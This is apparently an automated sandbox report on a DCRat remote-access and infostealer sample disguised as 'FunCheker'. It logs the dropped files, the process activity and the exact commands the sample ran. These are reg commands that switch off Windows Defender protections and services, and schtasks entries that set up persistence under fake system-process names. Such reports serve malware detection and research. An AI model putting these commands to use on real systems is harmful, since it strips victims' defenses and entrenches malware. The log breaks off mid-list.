Malware Analysis Report

2024-11-15 05:53

Sample ID 240722-xpxqfssfle
Target FunCheker.zip
SHA256 0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9
Tags
dcrat evasion infostealer rat trojan
score
10/10

Analysis Overview

score
10/10

SHA256

0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9

Threat Level: Known bad

The file FunCheker.zip was found to be: Known bad.

Malicious Activity Summary

dcrat evasion infostealer rat trojan

Modifies security service

Modifies Windows Defender Real-time Protection settings

DcRat

Process spawned unexpected child process

DCRat payload

Executes dropped EXE

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 19:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 19:02

Reported

2024-07-22 19:05

Platform

win10-20240404-en

Max time kernel

135s

Max time network

137s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FunCheker.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FunCheker.zip

Network

Country Destination Domain Proto
US 52.111.229.48:443 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 19:02

Reported

2024-07-22 19:05

Platform

win10-20240611-en

Max time kernel

150s

Max time network

82s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Multimedia Platform\cc11b995f2a76d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Internet Explorer\images\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Configuration\5940a34987c991 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows NT\TableTextService\dllhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows NT\TableTextService\5940a34987c991 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Windows Mail\en-US\6dd19aba3e2428 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Multimedia Platform\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Internet Explorer\images\cmd.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Uninstall Information\comcommon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Uninstall Information\a1e76cf482601b C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\56085415360792 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SchCache\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\en-US\csrss.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\en-US\886983d96e3d3e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\uk-UA\sppsvc.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\uk-UA\0a1fd5f707cd16 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\SchCache\cmd.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4756 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 4756 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 3800 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3228 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4952 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 3228 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Public\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "comcommon" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

